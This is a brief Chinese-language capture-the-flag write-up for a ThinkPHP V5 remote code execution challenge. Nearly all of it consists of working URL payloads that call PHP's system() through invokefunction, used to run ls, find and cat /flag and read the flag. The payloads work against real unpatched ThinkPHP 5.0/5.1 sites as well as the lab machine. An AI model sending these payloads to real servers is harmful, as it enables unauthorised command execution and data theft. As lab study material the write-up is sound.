解:打开靶机提示了是ThinkPHP V5的远程代码执行漏洞,V5.0、V5.1均有此问题
构造payload,查看目录
payload:/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls
用ls /flag和find / -name'flag'效果一样都可以找到flag文件
payload:/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls
/flag
payload:/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find / -name'flag'
再用cat抓一下内容就可以了,cat /flag
payload:/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag
flag{thinkphp5_rce} flag{thinkphp5_rce}